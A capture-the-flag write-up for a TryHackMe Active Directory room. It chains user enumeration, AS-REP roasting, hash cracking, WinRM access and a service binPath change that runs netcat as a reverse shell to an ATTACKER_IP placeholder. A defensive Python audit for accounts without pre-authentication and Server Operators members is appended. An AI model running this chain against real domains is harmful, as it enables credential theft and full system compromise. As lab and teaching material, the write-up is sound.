THM - Services

THM Easy 4/1/2026
#AD #Services #Windows #ASREPRoasting

🧠 Overview

Target machine exposing Active Directory services. Initial foothold achieved via AS-REP roasting, followed by privilege escalation through misconfigured service permissions.

https://tryhackme.com/room/services

  • AS-REP roasting possible due to users without pre-authentication
  • Weak password reused → easy crack
  • Server Operators group is highly dangerous
  • Service misconfiguration leads to full system compromise

🌐 Enumeration

nmap -p- -Pn -sS -sV -sC -T4 --min-rate 1000 --max-retries 2 -v $target

Key Findings

  • Port 88 (Kerberos) → Likely Domain Controller
  • Domain identified: services.local
  • Port 80 (HTTP) available

Web Enumeration

  • Found email in Footer:
    • j.doe@services.local
  • Discovered Users in About Page
    • http://$target/about.html
      • Joanne Doe
      • Jack Rock
      • Will Masters
      • Johnny LaRusso

User Enumeration

Generated possible usernames:

python3 uname-gen.py -u names.txt -o potential_users.txt

Validated users with Kerbrute:

kerbrute userenum --dc $target -d services.local potential_users.txt

Valid Users:

j.doe@services.local
w.masters@services.local
j.rock@services.local 
j.larusso@services.local

🔐 Initial Access (AS-REP Roasting)

Performed AS-REP roasting:

impacket-GetNPUsers services.local/ -dc-ip $target -usersfile users.txt -outputfile hashes.txt

Obtained hash for:

  • j.rock

Password Cracking

hashcat -m 18200 ../hashes.txt /usr/share/wordlists/rockyou.txt

Obtained Credentials

  • j.rock : Service*****

🐚 Shell Access

nxc winrm $target -u j.rock -p Service******
evil-winrm -u j.rock -p Service****** $target

🔐 Privilege Escalation

whoami /all

Interesting Finding

  • Member of:
    • BUILTIN\Server Operators

➡️ This group can modify services → PrivEsc opportunity

Exploit Steps

  1. Enumerate services and identify a target service
  2. Upload nc.exe to target machine
  3. Modify Service Binary Path
sc.exe config VMTools binPath="C:\Users\nc.exe -e cmd.exe ATTACKER_IP 443"
  4. Start Listener
nc -lvp 443
  5. Restart Service
sc.exe stop VMTools
sc.exe start VMTools
  6. Reverse shell received as Administrator
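
Defender's view of the chain above, as an added example that is not part of the original write-up: a small audit that flags accounts with Kerberos pre-authentication disabled (userAccountControl bit 0x400000) and accounts in Server Operators. The export format, the sample records and their values are constructed assumptions.

```python
from collections import defaultdict

UF_ACCOUNTDISABLE = 0x0002
UF_DONT_REQUIRE_PREAUTH = 0x400000  # "Do not require Kerberos preauthentication"
RISKY_GROUP_CNS = {"server operators"}  # BUILTIN group, well-known SID S-1-5-32-549
# Constructed sample export (assumed "attr: value" records separated by blank lines).
SAMPLE_EXPORT = """\
sAMAccountName: j.doe
userAccountControl: 512

sAMAccountName: j.rock
userAccountControl: 4260352
memberOf: CN=Server Operators,CN=Builtin,DC=services,DC=local

sAMAccountName: w.masters
userAccountControl: 4194818
"""

def parse_export(text):
    """Parse records; an attribute such as memberOf may repeat."""
    records = []
    for block in text.strip().split("\n\n"):
        rec = defaultdict(list)
        for line in block.splitlines():
            attr, sep, value = line.partition(":")
            if sep:
                rec[attr.strip().lower()].append(value.strip())
        if rec.get("samaccountname"):
            records.append(rec)
    return records

def audit(text):
    """Map account name -> findings. memberOf lists direct membership only."""
    findings = {}
    for rec in parse_export(text):
        name = rec["samaccountname"][0]
        uac = int(rec.get("useraccountcontrol", ["0"])[0])
        issues = []
        if uac & UF_DONT_REQUIRE_PREAUTH:
            issues.append("no-preauth-disabled-account" if uac & UF_ACCOUNTDISABLE else "no-preauth")
        for dn in rec.get("memberof", []):
            cn = dn.split(",", 1)[0].partition("=")[2].strip().lower()
            if cn in RISKY_GROUP_CNS:
                issues.append("member-of:" + cn)
        if issues:
            findings[name] = issues
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE_EXPORT))
```

An account that shows both findings is the combination this room chains; clearing the pre-authentication exemption and removing standing Server Operators membership closes each step independently.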

📁 Flags

type C:\Users\j.rock\Desktop\user.txt
type C:\Users\Administrator\Desktop\root.txt